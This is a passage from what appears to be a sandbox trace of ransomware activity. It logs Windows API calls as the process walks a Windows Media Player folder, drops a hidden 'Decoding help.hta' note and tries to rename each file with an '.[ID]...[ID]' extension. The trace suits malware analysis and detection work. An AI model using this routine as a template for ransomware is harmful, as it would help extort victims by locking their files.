cFileName="..", cAlternateFileName="")) returned 0 [0041.335] FindClose (in: hFindFile=0x5d8310 | out: hFindFile=0x5d8310) returned 1 Thread: id = 276 os_tid = 0x79c [0040.894] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*", lpFindFileData=0xaa0fd30 | out: lpFindFileData=0xaa0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81351db4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81351db4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8410 [0040.899] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.899] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0xaa0fd30 | out: lpFindFileData=0xaa0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x81351db4, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x81351db4, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.924] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.924] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.924] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0xaa0fd30 | out: lpFindFileData=0xaa0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79e33732, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79e33732, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x55587e5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4d82, dwReserved0=0x0, dwReserved1=0x0, cFileName="avtransport.xml", cAlternateFileName="")) returned 1 [0040.924] lstrcpyW (in: lpString1=0x109a8940, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" [0040.924] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned 66 [0040.924] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta" [0040.924] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\decoding help.hta")) returned 0xffffffff [0040.924] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388 [0041.001] WriteFile (in: hFile=0x388, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xaa0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xaa0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.002] CloseHandle (hObject=0x388) returned 1 [0041.002] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.003] lstrcmpiW (lpString1="Decoding help.hta", lpString2="avtransport.xml") returned 1 [0041.003] lstrlenW (lpString="avtransport.xml") returned 15 [0041.003] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" [0041.003] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned 66 [0041.003] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\", lpString2="avtransport.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml" [0041.003] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml" [0041.003] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0041.003] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\avtransport.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\avtransport.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\avtransport.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.013] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0xaa0fd30 | out: lpFindFileData=0xaa0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79e33732, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79e33732, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x555d411c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x14ff, dwReserved0=0x0, dwReserved1=0x0, cFileName="connectionmanager_dmr.xml", cAlternateFileName="")) returned 1 [0041.013] lstrcpyW (in: lpString1=0x109a8940, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" [0041.013] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned 66 [0041.013] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta" [0041.013] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\decoding help.hta")) returned 0x1 [0041.014] lstrcmpiW (lpString1="Decoding help.hta", lpString2="connectionmanager_dmr.xml") returned 1 [0041.014] lstrlenW (lpString="connectionmanager_dmr.xml") returned 25 [0041.014] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" [0041.014] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned 66 [0041.014] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\", lpString2="connectionmanager_dmr.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" [0041.014] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" [0041.014] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0041.014] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\connectionmanager_dmr.xml"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\connectionmanager_dmr.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\connectionmanager_dmr.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.014] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0xaa0fd30 | out: lpFindFileData=0xaa0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79e0d5d3, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79e0d5d3, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x550eb3bc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0xba3, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMR_120.jpg", cAlternateFileName="")) returned 1 [0041.014] lstrcpyW (in: lpString1=0x109a8940, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" [0041.014] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned 66 [0041.014] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta" [0041.014] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\decoding help.hta")) returned 0x1 [0041.014] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DMR_120.jpg") returned -1 [0041.014] lstrlenW (lpString="DMR_120.jpg") returned 11 [0041.014] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" [0041.014] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned 66 [0041.014] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\", lpString2="DMR_120.jpg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg" [0041.014] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg" [0041.015] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0041.015] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_120.jpg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_120.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.026] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0xaa0fd30 | out: lpFindFileData=0xaa0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79de7474, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79de7474, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x5511151c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x3a1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMR_120.png", cAlternateFileName="")) returned 1 [0041.026] lstrcpyW (in: lpString1=0x109a8940, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" [0041.026] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned 66 [0041.026] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta" [0041.026] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\decoding help.hta")) returned 0x1 [0041.026] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DMR_120.png") returned -1 [0041.026] lstrlenW (lpString="DMR_120.png") returned 11 [0041.026] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" [0041.026] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned 66 [0041.026] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\", lpString2="DMR_120.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png" [0041.026] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png" [0041.026] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png.[ID]g9uZrLhJaygpwRm1[ID]" [0041.026] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_120.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_120.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_120.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.026] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0xaa0fd30 | out: lpFindFileData=0xaa0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79d9b1b6, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79d9b1b6, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x5511151c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x4c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMR_48.jpg", cAlternateFileName="")) returned 1 [0041.026] lstrcpyW (in: lpString1=0x109a8940, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" [0041.026] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned 66 [0041.027] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta" [0041.027] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\decoding help.hta")) returned 0x1 [0041.027] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DMR_48.jpg") returned -1 [0041.027] lstrlenW (lpString="DMR_48.jpg") returned 10 [0041.027] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" [0041.027] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned 66 [0041.027] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\", lpString2="DMR_48.jpg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg" [0041.027] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg" [0041.027] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg.[ID]g9uZrLhJaygpwRm1[ID]" [0041.027] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_48.jpg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.jpg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_48.jpg.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.033] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0xaa0fd30 | out: lpFindFileData=0xaa0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5511151c, ftCreationTime.dwHighDateTime=0x1c9ea13, ftLastAccessTime.dwLowDateTime=0x5511151c, ftLastAccessTime.dwHighDateTime=0x1c9ea13, ftLastWriteTime.dwLowDateTime=0x5511151c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x10a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="DMR_48.png", cAlternateFileName="")) returned 1 [0041.033] lstrcpyW (in: lpString1=0x10ba6450, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" [0041.033] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned 66 [0041.033] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta" [0041.033] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\decoding help.hta")) returned 0x1 [0041.034] lstrcmpiW (lpString1="Decoding help.hta", lpString2="DMR_48.png") returned -1 [0041.034] lstrlenW (lpString="DMR_48.png") returned 10 [0041.034] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" [0041.034] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned 66 [0041.034] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\", lpString2="DMR_48.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png" [0041.034] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png" [0041.034] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png.[ID]g9uZrLhJaygpwRm1[ID]" [0041.034] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_48.png"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\DMR_48.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\dmr_48.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.034] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0xaa0fd30 | out: lpFindFileData=0xaa0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79e59891, ftCreationTime.dwHighDateTime=0x1ca0417, ftLastAccessTime.dwLowDateTime=0x79e59891, ftLastAccessTime.dwHighDateTime=0x1ca0417, ftLastWriteTime.dwLowDateTime=0x555fa27c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x18db, dwReserved0=0x0, dwReserved1=0x0, cFileName="RenderingControl.xml", cAlternateFileName="")) returned 1 [0041.035] lstrcpyW (in: lpString1=0x10ba6450, lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" [0041.035] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned 66 [0041.035] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta" [0041.035] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\Decoding help.hta" (normalized: "c:\\program files (x86)\\windows media player\\media renderer\\decoding help.hta")) returned 0x1 [0041.035] lstrcmpiW (lpString1="Decoding help.hta", lpString2="RenderingControl.xml") returned -1 [0041.035] lstrlenW (lpString="RenderingControl.xml") returned 20 [0041.035] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*" [0041.035] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\*.*") returned 66 [0041.035] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\", lpString2="RenderingControl.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml" [0041.035] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml") returned="\\\\?\\C:\\Program Files (x86)\\Windows Media Player\\Media Renderer\\RenderingControl.xml" [0041.035] lstrcatW (in: 